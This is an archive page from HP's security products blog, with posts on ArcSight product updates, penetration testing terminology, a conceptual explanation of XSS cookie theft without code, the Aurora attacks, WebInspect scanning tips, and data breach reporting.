HP Security Products Blog
From applications to infrastructure, enterprises and governments alike face a constant barrage of digital attacks designed to steal data, cripple networks, damage brands, and perform a host of other malicious intents. HP Enterprise Security Products offers products and services that help organizations meet the security demands of a rapidly changing and more dangerous world. HP ESP enables businesses and institutions to take a proactive approach to security that integrates information correlation, deep application analysis and network-level defense mechanisms—unifying the components of a complete security program and reducing risk across your enterprise. In this blog, we will announce the latest offerings from HP ESP, discuss current trends in vulnerability research and technology, reveal new HP ESP security initiatives and promote our upcoming appearances and speaking engagements.

Active Defense – Not just passive protection...

AdrianopleWhat does it mean to defend your network as opposed to just protecting it? In this post, I continue thinking out loud about defensive information security doctrine. I will look at an active and mobile defense of your enterprise.

Tags: Defense| HP| security

HP introduces update to ArcSight Threat Detector 2.0 and Threat Response Manager 5.5

TRM.pngHP today announced updates to its Big Data Security Analytics through HP ArcSight portfolio to enhance early detection and accelerate threat response and prevention.

 

According to a recent report on advanced targeted attacks released by Mandiant, attackers spend an estimated 243 days on a victim’s network before they are discovered.  In addition, nearly two-thirds of organizations learn that they have been breached from an external source, such as a customer or law enforcement.

 

HP updates 'HP ArcSight' portfolio to enhance big data security analytics

big security.pngHP today announced updates to its HP ArcSight portfolio, offering enterprises unified security analytics for big data with expanded identity monitoring to accelerate the detection of persistent threats.

 

Enterprises must proactively anticipate intrusions and hasten the detection of risks in order to protect valuable assets. To successfully identify and remediate occurrences of prolonged unauthorized network access, also known as advanced persistent threats (APTs), organizations must be prepared to:

 

  • Handle and process information at high velocity, volume and variety
  • Analyze structured and unstructured data both inside and outside their network
  • Monitor events in cloud, mobile and virtual environments
  • Automatically take action once a threat has been detected

 

Web Application Testing: Vulnerability Assessment vs. Penetration Test

Tiger.png

Few topics in the infosec world create as much heat as the classic "vulnerability assessment vs. penetration test" debate, and it's no different in the web application security space. Sadly, the discussion isn't usually around which is better. That would actually be an improvement. Instead the debate is usually semantic in nature, i.e. the flustered participants are usually disagreeing on what the terms actually mean. Step 1: agree on terms.

So, I'll be ambitious here and will tackle both subcomponents of the debate here: 1) what the terms actually mean, and 2) which is better for organizations to pursue.

Web Vulnerability Assessment vs. Web Penetration Test

 

It's worth stating explicitly that these two types of security test are in fact quite different. Many make the mistake of thinking that a penetration test is simply a vulnerability assessment with exploitation, or that a vulnerability assessment is a penetration test without exploitation. This is incorrect. If that were the case then we'd simply have one term that we'd qualify with "with or without exploitation".

 

A web application vulnerability assessment is fundamentally different from a penetration because its focus is on creating a list of as many findings as possible for a given web application. A penetration test, on the other hand, has a completely different purpose. Rather than yield a list of problems, a penetration test's focus is the achievement of a specific goal set by the customer, e.g. "dump the customer database", or "become an administrative user within the application". Also important to note is the fact that a penetration test is successful if and when the goal is acheived--not when a massive list of vulnerabilities is produced. That's what a vulnerability assessment is for.

 

Chain.png

 

Some are tempted to say that this is a goal-based penetration test. My question to them is simple: "As opposed to what other type?" Penetration testing is goal-based. That's its entire purpose. Even a customer direction as nebulous as "see what you can do" is absolutely a goal. It's an implicit goal of getting as far as you can given whatever constraints are in place.

 

The question of exploitation is another obstacle to clarity on this topic. Many have a simple binary switch for using the terms: "If there's exploitation it's a penetration test and if not it's a vulnerability assessment." Again, the key difference here is list-based vs. goal-based--not exploitation. It's possible do do (or not do) exploitation in both types of test. You can have a web vulnerability assessment where you are to exploit anything you find, and you can have a penetration test where you are asked to confirm that you can do something but not do it. Exploitation is an independent attribute that can be attached to either type of test.

 

When to Use One vs. the Other

 

Now that we see a distinction between terms, the next question is, "Which one is best?" Which should we be offering customers? As you may expect, the answer is that it depends on the customer and the project, but in my experience the answer will usually end up being a vulnerability assessment. Why? Because vulnerability assessments (getting a list of everything that needs fixing) is usually where most customers are in terms of maturity.

 

To tightly summarize:

 

VAPT.png

 

For questions or comments I can be reached at daniel.miessler@hp.com and on Twitter at @danielmiessler.::

Cookie Stealing With Cross-Site Scripting Explained

HPXSS.png

 

One of the most common questions I receive when doing appsec consulting revolves around cross-site scripting. Specifically, I am asked constantly why it is that stealing a cookie via reflected cross-site scripting has so many steps. If the goal is to get a victim to run a malicious script that steals cookies, and the attacker has to send the victim a link anyway...why not just send them a link to a script and be done with it? Why waste time with all this reflection?

 

It's a good question, and the answer eludes many bright and experienced security professionals--including some who have had weeks of application security training. What I'll do here is lay out a quick set of conceptual steps that should make the mechanics of this attack completely transparent.

 

  1. Cookies Are Authentication. This is key to remember. Cookies are given to you by a server after you've proven that you are who you say you are. This is why you don't have to enter your password repeatedly when you load each page. So if someone gets that cookie you're using, they can become you. Naturally, if someone gets your cookie from bank.com or store.com, that's a problem.
  2. Evil.com Cannot Access the Cookies From Bank.com. This is part two of the equation. If a script running off of evil.com could pull the cookies from bank.com or store.com, then attackers could just send a cookie stealing script that runs on evil.com and get the cookies from every other site the victim has been to. 

    That is prevented by the same origin policy, which determines that you can only access cookies from the domain you're running your script from. So if you click a link that points you to evil.com that steals cookies, it can only steal the cookie given to you by evil.com--which is not likely to be very useful to the attacker. Remember, it's the bank.com cookie that is the target of the attack.
  3. So We Must Get the User to Run a Script Served by Bank.com. This is the key to the whole thing: In order to steal a target user's cookie from bank.com, an attacker has to get that user to run a script served by bank.com that steals their cookie. So how do we do that? That's where the cross-site scripting comes in.
  4. Reflected Cross-site Scripting Allows User-submitted Content to Bounce Back to the Browser. This is the part that more people understand: You submit script in a request to a server, and because it's not properly handled it gets sent back to the client in the response--at which point the browser runs it. So the attacker simply finds an area on bank.com that is vulnerable to this problem, and he builds his link to point there as the container for his cookie-stealing script.
  5. The User Bounces the Cookie-stealing Script off of Bank.com. This is the final step that usually gets glossed over in explanations. The user clicks the link that the attacker sent him, which points to bank.com (it must be safe if it's bank.com, right?), and then the cookie-stealing script comes back in the browser and steals the cookie for the current user, i.e. the victim.

The key here is that if the script didn't come from bank.com it wouldn't have been able to steal the user's cookie for bank.com, and that's the only purpose for the cross-site scripting--to get malicious script to "come from" a known good website. That's why the extra step is there: you can only access the cookie of a site you're visiting.

 

At any rate, I hope this helps someone, and and in a future post I'll be creating and posting some proof-of-concept content to help illustrate how it works in practice. ::

Tags: XSS

China, Google and Web Security

Google recently announced that its China based location was the victim of an attack that targeted and compromised a critical internal system used to track the email accounts of those on China’s watch list. The system was designed to comply with government warrants for information concerning Chinese human rights activists. Some suspect China of targeting this specific system to circumvent the official warrant process in order to collect data on other Chinese citizens .

 

 

More alarmingly, this attack was not exclusively directed at Google. In all, at least 34 companies including Yahoo, Symantec, Northrop Grumman, Dow Chemical, Washington-based think tanks, and assorted human rights advocacy groups were compromised by the spear phishing attack .

 

At first rumored to be another Adobe flaw, closer examination by McAfee Labs revealed that the attack (code named “Aurora”) was actually a sophisticated zero-day vulnerability exploit against Microsoft’s Internet Explorer .

 

What should be most worrisome is not the zero-day in all versions of IE, but the new crop of “advanced persistent threats” that are siphoning money and intellectual property. These APTs are professionally organized, have extensive funding and employ smart people. The result: triple encrypted shell code which downloads multiple encrypted binaries used to drop an encrypted payload on a target machine which then establishes an encrypted SSL channel to connect to a command and control network . This is serious stuff.

 

Only a few years ago the majority of web-based attacks seemed to be launched by individuals or small groups to collect credit card information. These attacks had seriously consequences, but the magnitude of the losses and the organization of the black market economy were still child’s play by today’s standards.

 

Current threats from the Eastern bloc are directed at massive monetary gain - probably in the area of tens of millions of dollars . China appears hell bent on stealing state secrets and intellectual property from both governments and private business alike. The stakes are much higher, and the bad guys are much more capable of pulling off the heist.

 

China

 

We have known for a long time that phishing scams have been very effective at exploiting random samples of unsuspecting users. However, the focused targeting of private business is a newer, more sophisticated and lucrative threat. These spear fishing attacks are intensely researched and aimed at top level executives, and will become more common as time passes.

 

In a directly related point, consider the curious appearance of a new website called iiScan. This service offers to scan your web application for vulnerabilities - for FREE. Just sign up and point their software to your website, and they will, ‘figure out’ how vulnerable to an attack you might be. After the scan is done, they will email you a PDF based report to your email account.

 

Placing trust is such services has been discussed before, especially concerning cloud security.  It doesn’t take much to imagine all the things that could go wrong in this scenario, even if IE didn’t have multiple zero-day exploits, and a proof of concept embedded malicious PDF exploit had not just been released.

 

 It might very well turn out that NOSEC Technologies Co., Ltd. (the company behind iiScan) may be legitimate, or at least may have started out that way. Even if they are not actively attacking websites, it shouldn’t take long for them to become a high profile target for either private hackers, or for the Chinese government itself. What would be a better target than a database full of public websites and their known vulnerabilities? These sites, if not already compromised by iiScan, could be used as command and control drones, payload hosts, pieces of a distributed file-system, or merely SPAM relay channels.

 

Education and Armament

 

Everyday adds more proof that web application threats are being crafted by motivated professional organizations with deep pockets. Security needs to be taken very seriously, practiced diligently, and all users need be paranoid when surfing the web. This is especially important because the media is very cautious to report all the gory details of the real impact of cybercrime .

 

Installing preventative software is a good idea, too. Some of the latest tools and devices may help to prevent drive-by malware, spear phishing payloads, etc. Install Firefox and use plug-ins that flag suspected malware host sites. Use a personal web proxy, and restrict evil IPs. You can get the most comprehensive list of Korean and Chinese blocks (including iptables, htaccess files, dns zones, etc) from this page. Above all, stop clicking on those emails from your least technical friends that include an attached PowerPoint or PDF file to deliver a punch line. The villains take the Internet very seriously, and so should you.

 


UPDATE (1/19/2010):

 

Thanks to the Full-disclosure list (Marc, Smasher, Dan) for pointing out that the exploit was not nearly as sophisticated as McAfee has led us to believe.

 

The exaggerated sophistication of the attack re-enforces my point about media FUD - ironic in its own way because the media is quick to exaggerate the sophistication of the attacks, yet minimize the damage associated with them. It’s like getting up off the floor after a sucker punch and taunting "That didn't hurt". The reality is that simple attacks are still very effective - our security education and implementation still has a long way to go.

 

However, the real point of this article was to encourage a little more critical thinking surrounding software security. Putting blind faith in any type of security device (airport scanners, webapp scanners, etc.) is not good security practice.

 

 

 

 

 

 

WebInspect Tips: Changing settings to improve scans

Although running WebInspect with ‘out of the box’ scans settings might be the easiest way to start a scan, it is almost sure to produce unexpected results. Configuring any web application scanner is tricky, but by following these simple steps to fine tune the scan more accurate results will be generated.

 

Know your website

 

Performing a manual assessment of your website (before using any tools) will help you quickly spot mis-configured scans, tweak scan configuration parameters, and ensure more consistent results.

 

The first step is to become familiar with the site topology - directory structure, the number of pages, submission forms, etc. Perform a manual site survey and take notes. If you have access to the source, look at the file structure. If not, hover over the menu links and notice the site structure of the URLs. Are URL parameters used to drive the site navigation? If so, record them and use them to drive WebInspect.

 

It is also important to have some understanding of how the site operates behind the scenes. Different websites tend to handle common administrative tasks in unique and unexpected ways. For example, some websites require users to re-enter their passwords and a pass a ‘captcha’ test before assigning a new password. Other sites allow a password to be changed simply by entering a new password.

 

Knowing the basics of the site mechanics will go a long way toward heading off mis-configured scans, and getting familiar with the layout of your site is the best way to help WebInspect cover the entire site.

 

Protect your data

 

Web application security tools try to force websites to accept input data that they may not have been designed to handle. Therefore one side effect of auditing a website for vulnerabilities is that ‘garbage data’ can be injected into the database. On a database-driven site (like most blogs or CMS systems), this junk data will show up in other unexpected and very visible ways. After a scan, you may find that your default website language has been changed to Farsi, test files have been uploaded, the new blog color theme has been set to ‘Early 80s Disco’, or 13 new users have been added – complete with nonsense test Posts.

 

To minimize theses risks, scan a non-production version of the target website if possible. Sometimes audits are necessary on a complicated production server setup.  If this is the case, make a backup of the entire production database and verify the ability to successfully restore it before a scan. 

 

Limit the scan

 

If the local server hosts multiple web applications, it is important to restrict the audit to the application of interest. For example, my local Apache installation hosts 12 web applications in the htdocs root folder. When I want to scan “Wordpress”, I often forget to restrict the audit, and end up with a noticeably longer scan time, and an unusually large numbers of vulnerabilities. A quick glance at the “site” tree in WebInspect will quickly show whether the scan has started crawling into folders that were not intended.

 

To prevent the scan from ‘running away’ (taking too long to complete), open the scan settings before the scan is launched, check the “Restrict to folder” option and select “Directory and subdirectories”. Take note: this option is not enabled by default, so this may be worth remembering. Also, make sure the start URL either contains a start page, or the initial directory ends with a trailing “slash”.

 

Login Macros

 

Login Macros are essential to correctly scanning a website, yet may unknowingly be the root of many failed scans. Before creating a new login macro to allow WebInspect to successfully gain entry to the actual site, choose a user with limited ability to modify the site. If one is not available, create a new user with the lowest role possible. For example, Wordpress allows 4 roles with varying degrees of ‘power’: Administrator, Editor, Author and Contributor. Scanning Wordpress as the Administrator user may result in any of several undesirable scenarios, including the destruction of the entire blog, while scanning as a ‘Contributor’ should only result in a few extra unpublished blog entries.

 

Check your login macros for errors during the scan. Often a login macro that is incorrectly recorded may fail to login to the site which causes the scan to produce invalid results. Symptoms include: abnormally short scan times, lack of vulnerabilities, or large numbers of errors in the error log.

 

Other times the macro may not be able to log back into the website during a scan – even after the first login has been successful. For example, login macros tied to a user account that is able to change its own password will prevent the macro from logging back into the site. Once this happens, the error log may fill up with errors and the scan may stop. It is important to monitor the scan periodically and assess the scan ‘health’.

 

Conclusion

 

Some users might be unaware of the unintended consequences of web application vulnerability scanning, while others users might need help understanding their scan process. Although these simple steps are not remedies to solve issues scanning complex sites, they will help rudimentary scans to produce more valuable results. The more information that is provided to WebInspect through the scan configuration settings, the better the outcome of the scan will be.

85% of IT security decision makers think successful external attacks very unlikely

A new report this week from ITC reveals that eighty-five percent of IT security decision makers think that losing data via an external threat is  "very unlikely." Wow. Once upon a time, anyone involved in application security had a need to educate potential customers on why application security was important. You remember. It's not the network layer anymore...the application layer is where the attacks are occurring. That hasn't changed. It's one thing to think that your internal threats are greater than your external threats. What with 'curious' employees and such, that's understandable. But it's something else entirely to think that external threats simply aren't relevant. I'm sure the company that rhymes with smartland payment blisstyms thought so, too.

 

http://www.darkreading.com/security/vulnerabilities/showArticle.jhtml?articleID=220301560

 

Why we can’t count (data loss)

Numbers lie


Recently California made headlines after more than 800 data breach disclosures were filed in the first five months of 2009. Upon closer inspection, the large number of incidents does not represent a rise in actual incidents, but just a change in mandated reporting practices due to California’s new medical data breach law which went into effect on January 1, 2009 .


Unfortunately in practice we have no idea how much private information is lost to data breaches every year, because disclosure laws do not entice businesses to accurately report data breach incidents. While the number of reported incidents appears to be growing, it is a poor reflection of reality, owed in large part to changes in compliance laws. Although we are getting a better estimate on the number of “reported incidents”, the number of “actual” incidents is still unknown.


Data breaches will not decrease


While it seems fairly compelling to believe that increased legislation and financial penalty would motivate all sectors of industry to beef up data security, pragmatism dictates otherwise.


Digital data is like uranium: dense with a high yield. Almost all data breaches are of digital records. In contrast, old-fashioned paper records are fairly secure.  Stealing several thousand paper records is physically risky and combing through them for valuable information is prohibitively time consuming.


Computers make breaches easier and more attractive. Roughly 50% of all incidents are of the non-accidental malicious variety, such as malware, hacking, and laptop theft. These incidents yield 83% of the total number of stolen records reported. A large amount of valuable personal information available for minimal risk is a very attractive value proposition… so attractive that it presents new and increased incentive where none existed before. Of reported financial data breach incidents, 24% are caused by insiders, such as executives, IT administrators and employees, and 55% percent are attributed to outside hacking .


Lack of Incentive


Although data breaches are expensive (on average costing $6.6 million per incident), companies are very slow to take preventative action. Despite compliance laws, many companies still lack sufficient pragmatic (read ‘monetary) incentive to change their security practices . The guidelines currently in place suffer from a number of issues:


Laws are vague: Compliance laws vary from state to state, and often include exemption from disclosure requirements if the stolen private data is “encrypted” – even if the encryption keys are stolen, too. Any data that is publically available from federal, state, or local government sources is also exempt.


Companies can plead ignorance: Of those reported data breaches, 24% do not know or do not specify how much information was compromised. To avoid negative media attention, many victims of large data breaches simply claim “zero” in the “number of records stolen” column .


Notification timelines are usually vague: Loose wording such as “the most expedient time possible” and “without unreasonable delay” serves to allow companies to choose when they disclose their data incidents (except companies in Florida and Ohio).


Most incidents are unreported: According to a survey conducted at the RSA conference in 2007, a full 89% of companies that experienced a data breach did not publically disclose the incident . Assuming that incident disclosure is still largely a voluntary exercise without oversight, we have no reason to suspect that is has changed much for 2008 or 2009.


Summary: 


The interest in personal data is not a fad, and related data breaches will not magically disappear. While private data is lost from many sources, web applications figure prominently in the security equation.


Changes in policy will highlight the enormous number of incidents, and attitudes will have to change from a reactionary “defense” to a proactive security “offense”.


Preventative security medicine is the best and most cost effective policy. For the IT manager, the decision to spend several thousand dollars on current security tools should be an easy one to make. The cost of preventative security pales in comparison to the cost of cleaning of the mess after getting breached.

Jump Start Application Security Initiatives with SaaS

HP Application Security's own Caleb Sima, Chenxi Wang of Forrester Research, and Vinnie Liu of Stach and Liu give a great presentation about why corporations with seemingly insurmountable application security issues would do well to implement a SaaS solution. Tight timelines, limited budgets, and a lack of security experts? Compliance deadlines and hundreds of applications to secure? Learn how companies can leverage SaaS to meet these challenges.

  

Register for the presentation at:

  

http://www.csoonline.com/webcast/494866/?source=csocib_071309

Uncharted Territories: the personal-corporate-social-web-mashup

Corporate web communications have grown from simple web pages to massive and complex applications. The security department has mostly kept up and maintained a secure perimeter—even when that perimeter included outsourced and vendor systems. Contracts were in place, systems were secured, and life was good—even when the executives had their own blogs.

  

But just when everyone was getting comfortable again--enter the social web: MySpace, Twitter, and Facebook. People started using them and corporations followed.  Born of this are the corporate MySpace pages, Facebook groups, Facebook fan pages, management’s Twitter accounts, LinkedIn recruiting pages and more…

  

Did you see what happened there? No? It’s okay, neither did the security department.

  

So what was it? The customer contact point shifted from the corporate web environment to one controlled by a third-party.

  

Unlike most arrangements made with third-party vendors, this relationship is likely not covered by any type of contract, agreement or partnership. There is no guarantee for reliability, privacy, security or any type of regulatory controls. Your corporate users/administrators, as well as your customers, are bound by the third-party’s terms of service and policies, not yours, and you are also at their whim with regard to functionality and design.

  

These are no small issues when you consider the spider-web of laws, regulations and agencies that may cover many large businesses: Sarbanes-Oxley, HIPAA, GLB, etc. The security team, human resources and PR/brand all have a vested interest in keeping your sites and customer information secured, protected and private, and they just lost control of a key piece of the infrastructure.

  

This is not a completely theoretical risk. Looking at the news for the past few years, it’s easy to come up with examples that could have business, customer or employee impact. Even if no laws were violated or charges filed, in the internet age a negative story can spread like wildfire and damage brand.

  

Here are a few quick examples:

 

These are simply a few recent examples, but represent the tip of the iceberg. It’s hard to find news stories of confidential or proprietary corporate information posted to these sites, but you can safely bet it happens.

  

As marketing and PR types take a bigger interest in these channels to reach additional markets, and more and more users flock to these sites, the corporate presence there is going increase drastically.

  

So what should a company do? With regard to employees, here are a few suggestions:

 

  • Remind employees it is their responsibility to safeguard corporate and customer information.
  •  Incorporate messages about social networking into existing employee training and policies, and if applicable, give employees refresher courses.
  • Ensure employees realize the internet isn’t actually anonymous, and that they should behave ethically and in a manner that that doesn’t reflect poorly on themselves or the company.

   

If the company is creating an official presence on third-party web sites, some additional suggestions come to mind:

 

  • Determine the proper ownership for these channels—perhaps marketing or public relations—and establish a centralized point of contact.
  • Implement policies, guidelines and/or a code of ethics which clearly determine what information can and cannot be posted, and have a review procedure for anything questionable.
  • Implement policies/procedures for managing accounts and passwords to third-party systems, which include controls for changing passwords after employee attrition, choosing strong passwords, etc.
  • Implement procedures for monitoring the sites on a regular basis to ensure the messages, conversations and the brand “image” are appropriate (this can be contracted to other parties).
  • With the legal department, review the terms and conditions of the web site to look for potential pitfalls with regard to marketing through the site as well as ownership of uploaded content.
  • Thoroughly investigate privacy and security settings on the web site, and determine which should be enabled to best protect the company, customers and the user accounts.
  • If any relationship becomes mission critical or an important piece of the business, pursue contracts with the site operators which attempt to establish things like official support, uptime guarantees, additional security features, etc.   

These may all seem like daunting tasks, but any company with even a partially mature security department and polices should be able to integrate these types of changes fairly easily—in almost every case these are simply extensions, additions or clarifications to things already present in the corporate culture.

  

Given the immense popularity of these sites and their growth rates, the problem isn’t going away any time soon. Before the next wave of change comes to the internet, social networking policies and changes should be dealt with in a way that respects what employees do in their off-hours, protects the company and provides a new opportunity for corporate growth. The company that sticks its head in the sand may find itself in a nasty situation that could have been easily avoided with a little forethought.

Hacking has evolved

This is a great article about the value of a hacked PC to an attacker. While this focuses on personal PCs, all of these reasons can also apply to compromised web servers. Remember, web hacking has evolved. Script kiddies began by defacing web sites and conducting other forms of cyber vandalism. As applications grew in complexity, so did the attacks. Suddenly, it was all about the data as hackers learned how to extract the data contained in applications via SQL Injection and other methods. Now, though, the attacks are designed to compromise a web server and use it as a platform to spread malware (or worse) and conduct other crime. And as the threats grow, so does the need to integrate security throughout the application lifecycle.    

 http://voices.washingtonpost.com/securityfix/2009/05/the_scrap_value_of_a_hacked_pc.html?wprss=securityfix

Instant High Score!

One of our security researchers just happened to stumble across this interesting Highscores area of a free Flash skeet shooting game. Notice scores 6-10. Now I'm not saying he had anything to do with this. What I am saying is that if your query parameters are able to be manipulated, some hacker will mess up your application just to see if he can. And if that part of the site is insecure, what else is?

 

 

 

 

 

 

 

Even in recession, web application security spending to increase

A recent OWASP survey found that over a quarter of IT organizations plan to spend more money specifically for web application security.  Another 36% expect web application security spending to remain at current levels. Considering the state of the economy, those are good numbers. Even with recessionary belt-tightening and across the board budget reductions, web application security isn't being ignored because more enterprises understand it simply can't be ignored. Granted, this survey was conducted on a site devoted to web application security, so the responders are much more likely to care than 'other' IT professionals. But, if anybody should know that security spending is going up or at least staying the same, it's them. Let's call that a push.

There are some other good nuggets within thesurvey. This is the best selling point I've heard for web application security in quite some time. "Organizations that have suffered a public data breach spend more on security in the development process than those that have not." We'll call that the 'barn door axiom'.  If you've been breached, the pain ensures you do what you can to mitigate the risk of another incident. And the best way to do that is building security into the development process, not brushing it on after the product has been released.

http://www.owasp.org/images/b/b2/OWASP_SSB_Project_Report_March_2009.pdf

Search
Showing results for 
Search instead for 
Do you mean 
About the Author(s)
Follow Us


HP Blog

HP Software Solutions Blog

Labels
The opinions expressed above are the personal opinions of the authors, not of HP. By using this site, you accept the Terms of Use and Rules of Participation